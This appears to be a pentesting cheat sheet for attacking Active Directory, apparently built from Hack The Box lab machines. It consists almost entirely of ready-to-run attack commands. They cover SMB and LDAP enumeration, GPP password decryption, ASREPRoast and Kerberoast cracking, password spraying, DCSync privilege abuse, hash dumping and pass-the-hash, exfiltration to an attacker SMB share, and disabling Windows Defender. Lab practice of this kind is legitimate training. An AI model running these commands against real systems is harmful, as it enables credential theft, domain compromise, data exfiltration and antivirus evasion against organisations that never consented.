Initial access
SMB Enumeration
smbmap -H 10.10.10.100
smbmap -H 10.10.10.100 -R # recursive
smbmap -H 10.10.10.192 -u null
smbmap -H 10.10.10.100 -d domain.local -u USERNAME -p PASSWORD
smbclient \\\\10.10.10.169\\NETLOGON -U 'melanie'%'Welcome123!'
If access on GPO Policies search for cpasswords in "domain.local/Policies/{xx-xx-xx}/MACHINE/Preferences/Groups/Groups.xml" and decrypt with
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
ASREPRoast
Finding users that don't require preauth.
We can send an AS_REQ to the DC and get the original user key as a response. We can use this to crack the password
python3 GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip=10.10.10.161 -format hashcat -outputfile hash
hashcat -m 18200 --force -a 0 hash /usr/share/wordlists/rockyou.txt
Kerberoast
python3 GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -outputfile hashes
john hashes --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs
enum4linux
enum4linux -a 10.10.10.175
Rpcclient
rpcclient -U "" -N 10.10.10.169
enumdomusers
querydispinfo
ldapsearch
ldapsearch -H ldap://EGOTISTICAL-BANK.LOCAL:389/ -x -s base -b '' "(objectClass=*)" "*" +
ldapdomaindump
ldapdomaindump -u 'domain.local\user' -p PASSWORD 10.10.10.103 -o ldap/
ldapdomaindump ldap://10.10.10.100:389 -u 'domain.local\user' -p 'PASSWORD' -at SIMPLE
DNS enumeration
dig srv _ldap._tcp.dc._msdcs.DOMAIN.LOCAL @10.10.10.175
kerbrute
kerbrute userenum -d domain.LOCAL xato-net-10-million-usernames.txt --dc 10.10.10.175
Password enumeration
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt 10.10.10.175 ldap2 -V -f
crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!' --continue-on-success
Privesc
Enumeration tools
Change passwords of users with higher privileges
rpcclient //site.dom.local -U dom.local/USERNAME%PASSWORD
setuserinfo2 username 23 password
DCSync attack
(requires access to server)
Get groups that allow you to set DCSync permissions using powerview
Get-ObjectAcl -DistinguishedName "dc=domain,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')} | foreach{get-adobject -identity $_.SecurityIdentifier}
net group "Exchange Windows Permissions" xnull /add /domain
$pass = convertto-securestring 'password-1234' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\xnull', $pass)
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity "xnull" -Rights DCSync
Then remotely:
python3 secretsdump.py xnull:password-1234@10.10.10.161
python3 psexec.py forest.htb.local/administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
Exfiltration
SMB Server
on attacker machine
smbserver.py share . -smb2support -username xnull -password xnull
On victim machine
net use \\10.10.14.6\share /u:xnull xnull
copy 20191018035324_BloodHound.zip \\10.10.14.6\share\
AV Bypass
Disable
Set-MpPreference -DisableRealtimeMonitoring $true
Exclusion paths
Get-MpPreference | Select-Object -Property ExclusionPath -ExpandProperty ExclusionPath
Comments